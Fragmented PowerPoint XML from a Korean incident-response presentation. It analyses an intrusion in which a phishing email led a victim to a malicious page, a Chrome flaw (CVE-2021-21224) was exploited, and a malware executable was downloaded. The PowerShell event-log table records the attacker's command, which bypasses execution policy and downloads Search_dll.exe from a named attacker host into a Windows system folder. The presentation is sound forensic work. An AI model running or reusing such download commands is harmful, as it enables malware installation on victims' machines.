            <a:ext cx="9726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Daum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메일으로부터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악성 웹페이지 접속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등을 보낸 것으로 추정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악성 웹페이지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http://neotra.kro.kr:5080/resume/apply/register_page.html</a:t>
            </a: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7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2.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성 웹페이지 접속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4" y="2656828"/>
            <a:ext cx="6639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악성 웹페이지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http://neotra.kro.kr:5080/resume/apply/register_page.html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CVE 2021 21224</a:t>
            </a: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974FF1-07DE-4F9A-95E3-8C3B9E1C59C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6771604" y="2305050"/>
            <a:ext cx="4582196" cy="4187825"/>
            <a:chOff x="6495379" y="1540554"/>
            <a:chExt cx="4677446" cy="45118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D61B85E-2068-4F27-9CF0-DC83EEE3E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5379" y="1540554"/>
              <a:ext cx="4677446" cy="42194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04DE7C-47FE-4565-BDED-C891B2E049E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7663770" y="5759990"/>
              <a:ext cx="25496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/>
                <a:t>[register_page.html </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1300" b="1" dirty="0"/>
                <a:t>코드 중 일부</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1300" b="1" dirty="0"/>
                <a:t>]</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="13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6A0A98-4BCE-4CC8-A13C-9156350904E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447465" y="3810990"/>
            <a:ext cx="4714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90.0.4430.85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이하의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Chrome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공격자가 임의의 코드를 실행할 수 있게 하는 취약점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피해자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Chrome :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86.0.4240.75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592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89A4B3A-0EE1-402F-9E35-6CAB80B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단계별 상세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6D7B-FCC4-401C-9CFB-41D01B96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2.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>악성코드 다운로드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54B8-FB0A-4FEE-81FA-A72B76C2644C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951344" y="2413100"/>
            <a:ext cx="52303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시각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오후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3:58:33</a:t>
            </a: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이벤트 로그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Powershell.evtx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160EF9-6CF9-4A7D-A147-3F9540475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34462"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2440622" y="4432151"/>
          <a:ext cx="7482205" cy="2148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622">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4174606426"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6309583">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3407726343"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2155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TimeCreated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년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2</a:t>
                      </a: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8</a:t>
                      </a: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일 오후 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3:58:33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748"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="20812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EventID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012349"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="171586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HostApplication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powershell.exe -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ExecutionPolicy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ByPase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-Command &amp; (New-Object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System.Net.WebClient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DownloadFile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('http://neotra.kro.kr:5080/resume/apply/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up_documents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/Search_dll.exe', 'C:\Windows\Help\Windows\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ContentStore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\Search_dll.exe');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316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D4D38B7-D320-4087-8506-BD175B6265A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="951345" y="3445095"/>
            <a:ext cx="97261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파일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http://neotra.kro.kr:5080/resume/apply/up_documents/Search_dll.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/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경로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C:\Windows\Help\Windows\ContentStore\Search_dll.exe </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240598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1098</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>226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Theme</vt:lpstr>
      <vt:lpstr>침해사고 분석</vt:lpstr>
      <vt:lpstr>1. 개요  2. 단계별 상세 분석   3. 그 외 공격시도 (보고서 미반영)</vt:lpstr>
      <vt:lpstr>1. 개요 </vt:lpstr>
      <vt:lpstr>1. 개요 </vt:lpstr>
      <vt:lpstr>1. 개요 </vt:lpstr>
      <vt:lpstr>1. 개요 </vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>2. 단계별 상세 분석</vt:lpstr>
      <vt:lpstr>3. 그 외 공격시도 (보고서 미반영)</vt:lpstr>
      <vt:lpstr>3. 그 외 공격시도 (보고서 미반영)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이호준</dc:creator>
  <cp:lastModifiedBy>이호준</cp:lastModifiedBy>
  <cp:revision>26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-17T20:03:26Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-18T11:53:31Z</dcterms:modified>
</cp:coreProperties>
</file>